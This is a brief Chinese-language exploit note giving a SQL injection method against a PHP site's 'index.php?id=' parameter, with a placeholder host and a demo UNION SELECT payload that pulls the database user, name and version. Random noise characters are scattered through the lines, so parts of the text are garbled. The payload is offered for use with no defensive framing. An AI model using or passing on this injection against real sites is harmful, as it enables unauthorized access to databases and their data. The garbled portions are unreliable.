利用方法:' t0 n7 W0 X: C7 X; J8 [+ [! x
http://www.xxx.com/index.php?id=[SQL]5 k T/ ? X% K& G, d. g& R1 L
Demo:
# J- Y7 X; o: B- k: ^* j1 o! U http://www.xxx.com/index.php?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+ |